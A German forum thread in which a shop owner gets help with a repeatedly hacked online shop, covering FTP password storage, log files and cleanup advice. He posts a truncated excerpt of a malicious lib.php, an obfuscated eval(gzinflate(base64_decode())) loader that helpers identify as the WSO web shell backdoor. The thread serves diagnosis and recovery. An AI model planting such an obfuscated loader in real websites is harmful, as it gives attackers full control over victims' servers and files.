Plötzlich Schadcode ????

[reacend]

Lief denn nur der Shop in dem Account oder zufällig noch ein Wordpress oder sowas in der Art? Joomla usw. die werden gerne Angegriffen.

Grüße,
reacend

[p3e]

Wenn ich mich recht entsinne, nutzt CrossFTP (zumindest die Pro Version - nutze jetzt aber ein anderes Programm) ein Masterpasswort, dass man bei jedem Programmstart eingibt und mit dessen Hilfe die FTP-Passwörter in der Datenbank verschlüsselt gespeichert werden.

Nein.

Leider doch:

You can copy the user name and passwords from CrossFTP if you have never set a master password. Once you setup a master password, or imported a CrossFTP site file which is enrypted with a master password, all your site's passwords will no longer be allowed to copy/export, even after you cleared the master passwords. This helps to further improve your security level.

http://www.crossftp.com/kb/entry/24/

Du kannst die Passwörter nur sinnvoll schützen, indem du ein individuelles MasterPasswort nutzt. Auch CrossFTP kann da nicht zaubern.

[peter111]

Wer filezilla weiterhin nutzen möchte sollte über  die portable Version nachdenken.
Wenn man diese in einen TrueCrypt Container speichert und von dort aufruft kann seine Passwörter mit speichern. (so die portable Version nicht bereits verseucht ist )
Anleitungen zur Einrichtung gibt es im Netz.

[hstreicher]

es kann natürlich auch sein dass nach einem Upgrade des Shopsystems noch Reste von einer älteren Version übrig sind die unsicher sind , IClear war glaub ich so ein Problemfall

[Matt]

Haben diese Logfiles einen speziellen Namen? Oder reicht es, wenn ich den Support einfach darum bitte, mir die Logfiles zu senden?

access_log, error_log, xfer_log. Es ist aber extrem unwahrscheinlich, dass dir Strato heute noch Logfiles von vor über einem Monat geben kann.

[svenyo]

@Matt:
Werde mal mein Glück versuchen und bei Strato nachfragen.
Wünsche vorerst mal ein schönes Wochenende.

[p3e]

Und das hier lesen: https://www.modified-shop.org/wiki/FAQ:_Hilfe,_ich_glaube_mein_Shop_wurde_gehackt

Und noch wichtiger: Auch befolgen

[svenyo]

Hallo,

von Strato habe ich nun ein Logfile erhalten für den Zeitraum vom 23.03.2015 bis heute (ca. 15MB). Ein Error-Logfile habe ich auch für den Zeitraum vom 29.04.2015 bis heute. Kann man die hier posten, sodass sich die mal jemand anschaut, der etwas davon versteht?

Mein Shop ist nämlich schon wieder verseucht. Es war alles sauber. Ich verstehe das nicht.

Habe jetzt aber noch eine komische Datei gefunden, von der ich nicht weiß wo die hingehören soll: lib.php Leider lässt sich der Code hier irgendwie nicht Posten. Hier mal ein Ausschnitt:

Code: PHP  [Auswählen]

<?php

preg_replace("/.*/e","\x28\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7X17f9rG0vD/5/c732GtcipoMAac5CRgiBPHTpyLnfqSpInzUAECVAukSsLYzfF3f2ZmV5fVDUGc0z7vW7exQdqdnd2dnZ2dnUtJm3uTnq25LuswpTkYjvSH/240Bg8f1Efbw+ZI6zcbzbr+WK8/ftB8pLT/+Y/SUB9pc9PrzV29p/2mXUNFz5nr0VeDiea4ugdv1A/GbGgt3M1G80FDxTIDy7QcbOyH4eiBBFAbeIY1w0oHhqm7b7UZVvjnP3aNmdEDcGVVdxzL6ZnWWK0enb95U2lHX8LjHhVw1WpdfjXVrnv6tT6YYwM9z5jqfhF4Td97pjE1vHL4cKqNjUHv97nl6W7Pmc+wkHgN+Bozvax+OD3uvd8/OT08PlKrTN1UK4QuM0blDX1qezflUu90/wSKfFZfnp29653Dt97TF/tHZ+qXSoV9/ec/jBErsw3b0cfQoDeYsLK6dWA4+si63jIA6FIATPxMdG2oO2UqttWo1dn9+n12ZHnswJrPhoSZX1S/Njzx9faf/7hFJMrjeI/H9qAstzCaz/j8QLddzzFs19Tcie6WS5rjaDdSWf/H0b25M2OG26MyQdEnjD5AkzYNYxQe9loUa7G0hiJduQ0/lnrvjk/PgHgS6NELv1apt3d8/PpwP7Ugf4VFEfA//xF0eeFab6yxMStLvRwaelnZGVnOlE11b2INO7blet0dY2bPPebd2HoHF9bCcoZspk35N+m1O+8D1bErzZzrHVXt7mwhtK6SggJiq3sDy7qEVkuXMEhXATI+5p9Ll1+gY6Ur0dlEhQBshEQDBhBON7w1XFw4fOw+q/gaKI79+CMrT4cPEs870GgETjhEEta8pkTQLwEMAKhGq7cJQ44HK2/4mIguZ

Danke im voraus.
Gruß,
Sven

[p3e]

Das ist mit sehr großer Wahrscheinlichkeit Schadcode. Hast du die Hinweise in den FAQ die ich dir verlinkt habe befolgt? Solange Shop und Dein Rechner nicht sauber sind und du die Passwörter nicht geändert hast, wirst du auch immer wieder Ärger haben.

Es reicht auch nicht aus, wenn dein Virenscanner nicht meckert. Du solltest deinen Rechner so wie in den FAQ beschrieben neu überprüfen.

Edit: Ist die Datei neu hinzu gekommen?  Ansonsten würde ich sagen, dass das eine Backdoor ist. Wahrscheinlich nicht die einzige.

[hpzeller]

Hallo Sven

Bei dem Cod-Ausschnitt den Du gepostet hast handelt es sich mit grosser Wahrscheinlichkeit um  ein Webinterface mit dem der Hacker so ziemlich alles anstellen kann was via Browser möglich ist.

http://www.themenmix.de/themenmixer/webworking/trojaner-alarm-php-shell-38-via-ftp-eingeschleust

PS:
Du kannst ja die Datei 'lib.php' mal mit deinem Browser aufrufen, aber Vorsicht könnte auch Vieren enthalten!

Gruss
Hanspeter

[p3e]

So, ich habe mir deinen Code mal entschlüsselt und genauer angeschaut: es handelt sich um die WSO Web Shell die von Hackern gerne als Backdoor genutzt wird.
Damit kann dir der Hacker alle Dateien auf deiner Webseite manipulierten und auch neue hinzufügen.

[Alfred]

Mein Shop ist nämlich schon wieder verseucht. Es war alles sauber. Ich verstehe das nicht.

Liegen da alte CMS-Installationen rum auf dem Webspace oder ist an den Shop ein Blog eingebunden?
Joomla?
Sei bitte so nett und schicke mir den Link vom Shop per PM.

Danke.

[svenyo]

Bis vor ca. 10 Tagen war noch eine Uralt-Installation von XT-Commerce und eine Parallel-Installation des neuen Shops zu Testzwecken drauf. Die sind mittlerweile aber beide runter. Blog ist keiner angebunden.

Habe die Datei jetzt gelöscht. Alle FTP und Datenbank Passwort geändert, sowie auch Shop-AdminPasswort.
Und nochmal neu installiert.

[fishnet]

Und alle Dateien nach dem Schadcode oder Auszügen durchsucht ?
und auch die Datenbank durchsucht ?
Und auch mal mit einer Kaspersky Rescue CD durchsucht:
- externe Festplatten
- SD Card der Kamera
- und natürlich sämtliche PCs....

[svenyo]

Erst mal herzlichen Dank an alle Beteiligten für die Hilfe und Unterstützung.

Habe besagte lib.php vom Server gelöscht, Shop neu installiert, Passwörter geändert.
Und siehe da, seit etwa 3-4 Tagen herrscht Ruhe. Wollte nur eine abschließende Rückmeldung geben.

Nochmals  DANKE